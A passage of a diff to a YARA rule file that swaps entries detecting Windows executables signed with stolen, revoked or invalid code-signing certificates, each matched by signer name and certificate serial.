-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Lenovo IdeaCentre" and pe.signatures [ i ] . serial == "4d:03:ae:65:12:b8:5e:ab:41:84:ca:7f:4f:a2:e4:9c" )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Unirad LLC" and pe.signatures [ i ] . serial == "56:6a:c1:6a:57:b1:32:d3:f6:4d:ce:d1:4d:e7:90:ee" )
 }
 
-rule DITEKSHEN_INDICATOR_KB_CERT_333705C20B56E57F60B5Eb191Eef0D90 : FILE
+rule DITEKSHEN_INDICATOR_KB_CERT_661Ba8F3C9D1B348413484E9A49502F7 : FILE
 {
 	meta:
 		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "e868c3ff-a701-59bd-9cd6-bf49305fe28a"
+		id = "75fb83a1-c493-510a-8c01-4cc699d71465"
 		date = "2020-11-19"
 		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L7198-L7209"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L1871-L1882"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "f5ca35381842a0ea7c319d8388753347a72fc6df746064e520794aeb4b6724d0"
+		logic_hash = "661af02d7a206f50e996caf690ded541acab8c8268df9e86744d36f7322efe5c"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "44f0f77d8b649579fa6f88ae9fa4b4206b90b120"
+		thumbprint = "4ca944c9b69f72be3e95f385bdbc70fc7cff4c3ebb76a365bf0ab0126b277b2d"
 		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "TASK Holding ApS" and pe.signatures [ i ] . serial == "33:37:05:c2:0b:56:e5:7f:60:b5:eb:19:1e:ef:0d:90" )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Unique Digital Services Ltd." and pe.signatures [ i ] . serial == "66:1b:a8:f3:c9:d1:b3:48:41:34:84:e9:a4:95:02:f7" )
 }
 
-rule DITEKSHEN_INDICATOR_KB_CERT_79906Faf4Fbd75Baa10B322356A07F6D : FILE
+rule DITEKSHEN_INDICATOR_KB_CERT_0092D9B92F8Cf7A1Ba8B2C025Be730C300 : FILE
 {
 	meta:
-		description = "Detects NetSupport (client) signed executables"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "afca727c-ff08-5e47-9ef4-4cd2af96d294"
+		id = "856b4522-f314-5cbb-872e-08b21107881b"
 		date = "2020-11-19"
 		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L7211-L7222"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L1884-L1895"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "59862f31d0ba0cf56a93a86783ad802ea2e511845ab1d141aa224c0c61b720a7"
+		logic_hash = "207fcc48053afb6a435c40fd8e25a88753139c35f4882a1975fdb8c55dc8ea89"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "f84ec9488bdac5f90db3c474b55e31a8f10a2026"
+		thumbprint = "b891c96bd8548c60fa86b753f0c4a4ccc7ab51256b4ee984b5187c62470f9396"
 		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "NetSupport Ltd" and pe.signatures [ i ] . serial == "79:90:6f:af:4f:bd:75:ba:a1:0b:32:23:56:a0:7f:6d" )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "UPLagga Systems s.r.o." and pe.signatures [ i ] . serial == "00:92:d9:b9:2f:8c:f7:a1:ba:8b:2c:02:5b:e7:30:c3:00" )
 }
 
-rule DITEKSHEN_INDICATOR_KB_CERT_030Ba877Daf788A0048D04A85B1F6Eca : FILE
+rule DITEKSHEN_INDICATOR_KB_CERT_00E5Ad42C509A7C24605530D35832C091E : FILE
 {
 	meta:
 		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "66689847-aa67-5029-9f37-cc410a564633"
+		id = "44615e9d-6677-5642-b56d-82c0577f758c"
 		date = "2020-11-19"
 		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L7224-L7235"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L1897-L1908"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "70b5b9011b53b7c9ac9dc286f3512a7a8bec5ec35ade0ee1c4bedd0a128994da"
+		logic_hash = "8d76474257ee9a24d4785ddd119e586712a157ff7b420a7db2b8efe06c43f76c"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "1f10c5676a742548fb430fbc1965b20146b7325a"
+		thumbprint = "17b1f6ffc569acd2cf803c4ac24a7f9828d8d14f6b057e65efdb5c93cc729351"
 		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Skylum Software USA, Inc." and pe.signatures [ i ] . serial == "03:0b:a8:77:da:f7:88:a0:04:8d:04:a8:5b:1f:6e:ca" )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "VESNA, OOO" and pe.signatures [ i ] . serial == "00:e5:ad:42:c5:09:a7:c2:46:05:53:0d:35:83:2c:09:1e" )
 }
 
-rule DITEKSHEN_INDICATOR_KB_CERT_00Fe83F58D001327Fbaafd7Bac76Ae6818 : FILE
+rule DITEKSHEN_INDICATOR_KB_CERT_3E57584Db26A2C2Ebc24Ae3E1954Fff6 : FILE
 {
 	meta:
 		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "5d41be99-85de-55bc-817b-eea510aff308"
+		id = "9073846e-97c7-5b2e-a81f-3bbd06699842"
 		date = "2020-11-19"
 		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L7237-L7251"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L1910-L1921"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "8aac715daba042ca4a57cd65b98e6192c87a13e7e0c8ff4a3bc81c43223035ad"
+		logic_hash = "cfc68c32ceba351610651d34fb420c64bab9a3b1564d9b6392f0ee8cdcdac7de"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "c130dd74928da75a42e9d32a1d3f2fd860d81566"
+		thumbprint = "4ecbada12a11a5ad5fe6a72a8baaf9d67dc07556a42f6e9a9b6765e334099f4e"
 		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "A. Jensen FLY Fishing ApS" and ( pe.signatures [ i ] . serial == "fe:83:f5:8d:00:13:27:fb:aa:fd:7b:ac:76:ae:68:18" or pe.signatures [ i ] . serial == "00:fe:83:f5:8d:00:13:27:fb:aa:fd:7b:ac:76:ae:68:18" ) )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Zaryad LLC" and pe.signatures [ i ] . serial == "3e:57:58:4d:b2:6a:2c:2e:bc:24:ae:3e:19:54:ff:f6" )
 }
 
-rule DITEKSHEN_INDICATOR_KB_CERT_0788260F8541539D97F49Ddaa837B166 : FILE
+rule DITEKSHEN_INDICATOR_KB_CERT_13794371C052Ec0559E9B492Abb25C26 : FILE
 {
 	meta:
 		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "fb102e07-92fc-5ed8-a9cf-1cfd53f54281"
+		id = "e2a4fdb2-fa04-5662-bb84-5c0c4892e3af"
 		date = "2020-11-19"
 		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L7253-L7265"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L1923-L1934"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "48985ac2c450bc4b3c5de635717dcf3a7ecf64109aa4059477ba79606f7fc2a4"
+		logic_hash = "af80177181efd92b4e1a4a5c665df01add069dc3b47074bcbdd503516cf5a844"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "569511fdc5e8dea454e97b005de1af5272d4bd32"
-		hash1 = "6ad407d5c7e4574c7452a1a27da532ee9a55bb4074e43aa677703923909169e4"
+		thumbprint = "dd3ab539932e81db45cf262d44868e1f0f88a7b0baf682fb89d1a3fcfba3980b"
 		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "TechSmith Corporation" and pe.signatures [ i ] . serial == "07:88:26:0f:85:41:53:9d:97:f4:9d:da:a8:37:b1:66" )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Carmel group LLC" and pe.signatures [ i ] . serial == "13:79:43:71:c0:52:ec:05:59:e9:b4:92:ab:b2:5c:26" )
 }
 
-rule DITEKSHEN_INDICATOR_KB_CERT_0Ca5Acafb5Fdca6F8B5D66D1339A5D85 : FILE
+rule DITEKSHEN_INDICATOR_KB_CERT_51Aead5A9Ab2D841B449Fa82De3A8A00 : FILE
 {
 	meta:
 		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "6f0e9e3a-52fc-5ffd-90b3-743d925388df"
+		id = "d64ff10d-e4dd-5d89-a600-d136571be940"
 		date = "2020-11-19"
 		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L7267-L7279"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L1936-L1947"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "2612e58b4e1a6fa65b32fe855b3542882c79345e93ab134933c893e90bb1a75c"
+		logic_hash = "1658a12bb040b5b16c61469fe52abbaaecf5bd66bf5e45a2c2da9f80fa0c66f5"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "ab25053a3f739ddd4505cf5d9d33b5cc50f3ab35"
-		hash1 = "a3ab41d9642a5a5aa6aa4fc1e316970e06fa26c6c545dd8ff56f82f41465ec08"
+		thumbprint = "155edd03d034d6958af61bc6a7181ef8f840feae68a236be3ff73ce7553651b0"
 		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Valve" and pe.signatures [ i ] . serial == "0c:a5:ac:af:b5:fd:ca:6f:8b:5d:66:d1:33:9a:5d:85" )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Corsair Software Solution Inc." and pe.signatures [ i ] . serial == "51:ae:ad:5a:9a:b2:d8:41:b4:49:fa:82:de:3a:8a:00" )
 }
 
-rule DITEKSHEN_INDICATOR_KB_CERT_387Eeb89B8Bf626Bbf4C7C9F5B998B40 : FILE
+rule DITEKSHEN_INDICATOR_KB_CERT_Bce1D49Ff444D032Ba3Dda6394A311E9 : FILE
 {
 	meta:
 		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "56dfc1b5-3aba-5c21-93e6-85d41a2a4415"
+		id = "ee980353-b7c3-5738-84ae-e51c021e6597"
 		date = "2020-11-19"
 		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L7281-L7293"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L1949-L1960"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "3436b7954e5488614f8f0998fe9eae7773d821c776436836d7b2230cd9c97f46"
+		logic_hash = "eeb1556808e790eea964658a8499ec2d9cc5638bf696fbbade2bc08a29fb3e65"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "e94ad249747fd4b88750b2cd6d8d65ad33d3566d"
-		hash1 = "004f011b37e4446fa04b76aae537cc00f6588c0705839152ae2d8a837ef2b730"
+		thumbprint = "e9a9ef5dfca4d2e720e86443c6d491175f0e329ab109141e6e2ee4f0e33f2e38"
 		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "ULTRA ACADEMY LTD" and pe.signatures [ i ] . serial == "38:7e:eb:89:b8:bf:62:6b:bf:4c:7c:9f:5b:99:8b:40" )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "DECIPHER MEDIA LLC" and pe.signatures [ i ] . serial == "bc:e1:d4:9f:f4:44:d0:32:ba:3d:da:63:94:a3:11:e9" )
 }
 
-rule DITEKSHEN_INDICATOR_KB_CERT_035B41766660B08Aaf121536F0D83D4D : FILE
+rule DITEKSHEN_INDICATOR_KB_CERT_00Dadf44E4046372313Ee97B8E394C4079 : FILE
 {
 	meta:
-		description = "Detects signed excutable of DiskCryptor open encryption solution that offers encryption of all disk partitions"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "80c803e1-16b8-583d-9d4f-3a0f693c9e24"
+		id = "bb7178f4-079f-5f7e-9761-3f73203603c7"
 		date = "2020-11-19"
 		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L7295-L7306"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L1962-L1973"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "924ed1d3c6a8d378471a2e5301f3a813ee8622135ce001d3061918d9454cdcc4"
+		logic_hash = "e4480ad6ce302a87e38915ef7ba09a94a4626ed359333276b899474f21d46238"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "2022d012c23840314f5eeaa298216bec06035787"
+		thumbprint = "80986ae0d4f8c8fabf6c4a91550c90224e26205a4ca61c00ff6736dd94817e65"
 		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Alexander Lomachevsky" and pe.signatures [ i ] . serial == "03:5b:41:76:66:60:b0:8a:af:12:15:36:f0:d8:3d:4d" )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Digital Capital Management Ireland Limited" and pe.signatures [ i ] . serial == "00:da:df:44:e4:04:63:72:31:3e:e9:7b:8e:39:4c:40:79" )
 }
 
-rule DITEKSHEN_INDICATOR_KB_CERT_1A041Db92237C18948109789F627B3Cd : FILE
+rule DITEKSHEN_INDICATOR_KB_CERT_00F8C2E08438Bb0E9Adc955E4B493E5821 : FILE
 {
 	meta:
 		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "0a5a6b19-0fbe-5e0c-bfb1-ca201207f6c7"
+		id = "75f505d0-c79a-5eab-a61f-29ec238ac045"
 		date = "2020-11-19"
 		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L7308-L7320"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L1975-L1986"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "f5e07eb58a68dea062522869c43daeddab666f12b078a4f2ce9aa37885e46cbd"
+		logic_hash = "2258ea96b56acb3025b5b2f39c07d482c375e75323d6f8e8ded91b8dab00656e"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "2315cf802aaf96d11f18766315239016e533bf32"
-		hash1 = "a0338becbfe808bc7655d8b6c825e2e99b37945e5d8fc43a83aec479d64f422d"
+		thumbprint = "459ef82eb5756e85922a4687d66bd6a0195834f955ede35ae6c3039d97b00b5f"
 		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Amitotic" and pe.signatures [ i ] . serial == "1a:04:1d:b9:22:37:c1:89:48:10:97:89:f6:27:b3:cd" )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "DocsGen Software Solutions Inc." and pe.signatures [ i ] . serial == "00:f8:c2:e0:84:38:bb:0e:9a:dc:95:5e:4b:49:3e:58:21" )
 }
 
-rule DITEKSHEN_INDICATOR_KB_CERT_06Df5C318759D6Ea9D090Bfb2Faf1D94 : FILE
+rule DITEKSHEN_INDICATOR_KB_CERT_00D2Caf7908Aaebfa1A8F3E2136Fece024 : FILE
 {
 	meta:
 		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "8c1f226f-6fc0-5136-ac19-7d88d7505a8e"
+		id = "043a598d-8b84-597f-ac2e-035cc9ccef77"
 		date = "2020-11-19"
 		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L7322-L7334"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L1988-L1999"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "3be08901a44c1c94cfb93e56075270ed974399ccc0a4dce15299456dad645822"
+		logic_hash = "2c8a322e687ed575e66ff308bcf0950ab87bc5ac3ab561c8cc3d81e9181ac708"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "4418e9a7aab0909fa611985804416b1aaf41e175"
-		hash1 = "47dbb2594cd5eb7015ef08b7fb803cd5adc1a1fbe4849dc847c0940f1ccace35"
+		thumbprint = "82baf9b781d458a29469e5370bc9752ebef10f3f8ea506ca6dd04ea5d5f70334"
 		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "SpiffyTech Inc." and pe.signatures [ i ] . serial == "06:df:5c:31:87:59:d6:ea:9d:09:0b:fb:2f:af:1d:94" )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "FANATOR, OOO" and pe.signatures [ i ] . serial == "00:d2:ca:f7:90:8a:ae:bf:a1:a8:f3:e2:13:6f:ec:e0:24" )
 }
 
-rule DITEKSHEN_INDICATOR_KB_CERT_330000026551Ae1Bbd005Cbfbd000000000265 : FILE
+rule DITEKSHEN_INDICATOR_KB_CERT_003223B4616C2687C04865Bee8321726A8 : FILE
 {
 	meta:
 		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "7f86e427-110f-5bcc-bb53-ca534f7444fc"
+		id = "05320823-08e5-58f4-896c-ae7f01b40a3b"
 		date = "2020-11-19"
 		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L7337-L7351"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L2001-L2012"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "ae836069665d088c6a309efe5166e260836dce6398c51701b2274515bdaa2cbd"
+		logic_hash = "671e3a589fb24a6c5e38126df45a4767815eff32014172930cab6ffbe135af81"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "e168609353f30ff2373157b4eb8cd519d07a2bff"
-		hash1 = "a471fdf6b137a6035b2a2746703cd696089940698fd533860d34e71cc6586850"
+		thumbprint = "321218e292c2c489bbc7171526e1b4e02ef68ce23105eee87832f875b871ed9f"
 		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Microsoft Windows" and pe.signatures [ i ] . issuer contains "Microsoft Windows Production PCA 2011" and pe.signatures [ i ] . serial == "33:00:00:02:65:51:ae:1b:bd:00:5c:bf:bd:00:00:00:00:02:65" and 1614796238 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "FORTUNE STAR TRADING, INC." and pe.signatures [ i ] . serial == "32:23:b4:61:6c:26:87:c0:48:65:be:e8:32:17:26:a8" )
 }
 
-rule DITEKSHEN_INDICATOR_KB_CERT_309368B122Ab63103Dddd4Ad6321A82C : FILE
+rule DITEKSHEN_INDICATOR_KB_CERT_0Fa13Ae98E17Ae23Fcfe7Ae873D0C120 : FILE
 {
 	meta:
 		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "a9c2fa86-506e-503a-a864-8368f63662c4"
+		id = "5e926cb1-efd0-5f9d-9327-341bb2f1a5f5"
 		date = "2020-11-19"
 		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L7353-L7365"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L2014-L2025"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "37a39d63e2bce6d4ce501e3032ee12fe8c5b39e8d8cb0f3e0c6d0be375bcffc8"
+		logic_hash = "312d810386aebb509ffbd09d6b1ad6a761a03bc07ba5e4a158235786063389a9"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "1370de077e2ba2065478dee8075b16c0e5a5e862"
-		hash1 = "b7376049b73feb5bc677a02e4040f2ec7e7302456db9eac35c71072dd95557eb"
+		thumbprint = "be226576c113cd14bcdb67e46aab235d9257cd77b826b0d22a9aa0985bad5f35"
 		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Systems Accounting Limited" and pe.signatures [ i ] . serial == "30:93:68:b1:22:ab:63:10:3d:dd:d4:ad:63:21:a8:2c" )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "KLAKSON, LLC" and pe.signatures [ i ] . serial == "0f:a1:3a:e9:8e:17:ae:23:fc:fe:7a:e8:73:d0:c1:20" )
 }
 
-rule DITEKSHEN_INDICATOR_KB_CERT_19F613Cf951D49814250701037442Ee2 : FILE
+rule DITEKSHEN_INDICATOR_KB_CERT_3696883055975D571199C6B5D48F3Cd5 : FILE
 {
 	meta:
 		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "780c515e-811c-5f44-97a2-9ed93a7d9d89"
+		id = "8af62be2-488f-5474-b674-73bf157dff00"
 		date = "2020-11-19"
 		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L7367-L7384"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L2027-L2038"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "1ea5f770ddbb7dba836049bec0c7b73cd5bc6a87514f8ea00288cb9d52d17651"
+		logic_hash = "9232413a071a6100ba806b1fad2cd6cd2bb85351c36ad25cfc31b66ad041d686"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint1 = "6feab07fa782fc7fbddde8465815f4d04d79ad97"
-		thumbprint2 = "41aaafa56a30badb291e96d31ed15a9343ba7ed3"
-		hash1 = "9629cae6d009dadc60e49f5b4a492bd1169d93f17afa76bee27c37be5bca3015"
-		hash2 = "3b3281feef6d8e0eda2ab7232bd93f7c747bee143c2dfce15d23a1869bf0eddf"
+		thumbprint = "933749369d61bebd5f2c63ff98625973c41098462d9732cffaffe7e02823bc3a"
 		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Cooler Master" and ( pe.signatures [ i ] . serial == "19:f6:13:cf:95:1d:49:81:42:50:70:10:37:44:2e:e2" or pe.signatures [ i ] . serial == "6b:e8:ee:f0:82:a4:f5:96:4c:75:0b:c0:07:24:f6:4a" ) )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Korist Networks Incorporated" and pe.signatures [ i ] . serial == "36:96:88:30:55:97:5d:57:11:99:c6:b5:d4:8f:3c:d5" )
 }
 
-rule DITEKSHEN_INDICATOR_KB_CERT_2D8Cfcf04209Dc7F771D8D18E462C35A : FILE
+rule DITEKSHEN_INDICATOR_KB_CERT_00Aff762E907F0644E76Ed8A7485Fb12A1 : FILE
 {
 	meta:
 		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "6b2b25af-dae5-5055-851d-e515f6beee58"
+		id = "92113fc4-ef5b-5e86-bc8e-baf342ddf276"
 		date = "2020-11-19"
 		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L7386-L7398"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L2040-L2051"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "e7eee6a6593c231c193145eeefd03a0f32c1d8cc103c97cfa26b5af7363c9b08"
+		logic_hash = "0be4642f6aaf2183d593240efcc8c2046970d3806a67ff53ca4ce7ee85df90e5"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "a9c61e299634ba01e269239de322fb85e2da006b"
-		hash1 = "af27173ed576215bb06dab3a1526992ee1f8bd358a92d63ad0cfbc0325c70acf"
+		thumbprint = "7b0c55ae9f8f5d82edbc3741ea633ae272bbb2207da8e88694e06d966d86bc63"
 		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "AA PLUS INVEST d.o.o." and pe.signatures [ i ] . serial == "2d:8c:fc:f0:42:09:dc:7f:77:1d:8d:18:e4:62:c3:5a" )
